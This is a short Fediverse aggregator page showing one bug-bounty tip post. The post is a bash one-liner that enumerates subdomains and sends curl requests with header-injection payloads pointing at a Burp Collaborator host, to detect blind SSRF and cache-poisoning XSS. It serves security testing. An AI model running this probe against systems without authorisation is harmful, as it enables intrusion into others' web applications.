home.social

#blindinjection — Public Fediverse posts

Live and recent posts from across the Fediverse tagged #blindinjection, aggregated by home.social.

  1. Checking for blind #SSRF in Headers & #XSS via cache poisoning

    cat urls.txt | assetfinder --subs-only| httprobe | while read url; do xss1=$(curl -s -L $url -H 'X-Forwarded-For: xss.burpcollaboratorhost'|grep xss) xss2=$(curl -s -L $url -H 'X-Forwarded-Host: xss.burpcollaboratorhost'|grep xss) xss3=$(curl -s -L $url -H 'Host: xss.burpcollaboratorhost'|grep xss) xss4=$(curl -s -L $url --request-target burpcollaboratorhost/ --max-time 2); echo -e "$url""\n""Method[1] X-Forwarded-For: xss+ssrf => $xss1""\n""Method[2] X-Forwarded-Host: xss+ssrf ==> $xss2""\n""Method[3] Host: xss+ssrf ==> $xss3""\n""Method[4] GET xss.burpcollaboratorhostHTTP/1 ""\n";done\

    github.com/tomnomnom/assetfind
    github.com/tomnomnom/httprobe

    #bugbounty #bugbountytips #burpsuite #assetfinder #httprobe #blindinjection #owasp